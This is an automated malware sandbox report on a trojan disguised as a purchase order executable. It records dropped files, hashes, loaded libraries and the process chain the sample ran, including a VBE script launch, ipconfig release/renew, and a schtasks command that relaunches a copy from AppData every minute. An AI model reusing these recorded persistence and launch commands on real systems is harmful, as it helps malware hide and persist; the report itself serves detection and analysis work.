Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB62CA	0_2_00BB62CA
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB43BF	0_2_00BB43BF
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAC426	0_2_00BAC426
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAF461	0_2_00BAF461
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BCD440	0_2_00BCD440
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB77EF	0_2_00BB77EF
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BCD8EE	0_2_00BCD8EE
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BA286B	0_2_00BA286B
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAE9B7	0_2_00BAE9B7
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BD19F4	0_2_00BD19F4
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB3E0B	0_2_00BB3E0B
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BC4F9A	0_2_00BC4F9A
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAEFE2	0_2_00BAEFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B2007	8_2_005B2007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B8037	8_2_005B8037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005AE0BE	8_2_005AE0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0059E1A0	8_2_0059E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0059225D	8_2_0059225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B22C2	8_2_005B22C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005CA28E	8_2_005CA28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005AC59E	8_2_005AC59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0061C7A3	8_2_0061C7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005CE89F	8_2_005CE89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060291A	8_2_0060291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005C6AFB	8_2_005C6AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005F8B27	8_2_005F8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005BCE30	8_2_005BCE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005C7169	8_2_005C7169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006251D2	8_2_006251D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00599240	8_2_00599240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00599499	8_2_00599499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B1724	8_2_005B1724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B1A96	8_2_005B1A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00599B60	8_2_00599B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B7BAB	8_2_005B7BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B1D40	8_2_005B1D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B7DDA	8_2_005B7DDA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A7E0BE	20_2_00A7E0BE
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A88037	20_2_00A88037
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A82007	20_2_00A82007
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A6E1A0	20_2_00A6E1A0
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A9A28E	20_2_00A9A28E
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A822C2	20_2_00A822C2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A6225D	20_2_00A6225D
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A7C59E	20_2_00A7C59E
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AEC7A3	20_2_00AEC7A3
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A9E89F	20_2_00A9E89F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD291A	20_2_00AD291A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A96AFB	20_2_00A96AFB
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AC8B27	20_2_00AC8B27
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A8CE30	20_2_00A8CE30
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AF51D2	20_2_00AF51D2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A97169	20_2_00A97169
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A69240	20_2_00A69240
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A69499	20_2_00A69499
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A81724	20_2_00A81724
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A81A96	20_2_00A81A96
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A87BAB	20_2_00A87BAB
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A69B60	20_2_00A69B60
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A87DDA	20_2_00A87DDA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A81D40	20_2_00A81D40

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: String function: 00BBF5F0 appears 31 times
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: String function: 00BBEC50 appears 56 times
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: String function: 00BBEB78 appears 39 times
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: String function: 00A7FD60 appears 40 times
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: String function: 00A80DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: String function: 005B0DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: String function: 005AFD60 appears 40 times

Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs PO3311926.exe

Source: PO3311926.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@56/58@2/4

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BA6C74 GetLastError,FormatMessageW,

0_2_00BA6C74

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005F194F AdjustTokenPrivileges,CloseHandle,	8_2_005F194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005F1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	8_2_005F1F53
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AC194F AdjustTokenPrivileges,CloseHandle,	20_2_00AC194F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AC1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	20_2_00AC1F53

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_00605B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_00605B27

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005FDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

8_2_005FDC9C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_00614089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

8_2_00614089

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00BBA6C2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

File created: C:\Users\user\wrse

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\bOVQxHmcqdPEzZOw
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03

Source: C:\Users\user\Desktop\PO3311926.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\PO3311926.exe	Command line argument: sfxname	0_2_00BBDF1E
Source: C:\Users\user\Desktop\PO3311926.exe	Command line argument: sfxstime	0_2_00BBDF1E
Source: C:\Users\user\Desktop\PO3311926.exe	Command line argument: STARTDLG	0_2_00BBDF1E

Source: PO3311926.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO3311926.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO3311926.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO3311926.exe	ReversingLabs: Detection: 68%
Source: PO3311926.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\PO3311926.exe

File read: C:\Users\user\Desktop\PO3311926.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO3311926.exe "C:\Users\user\Desktop\PO3311926.exe"
Source: C:\Users\user\Desktop\PO3311926.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO3311926.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
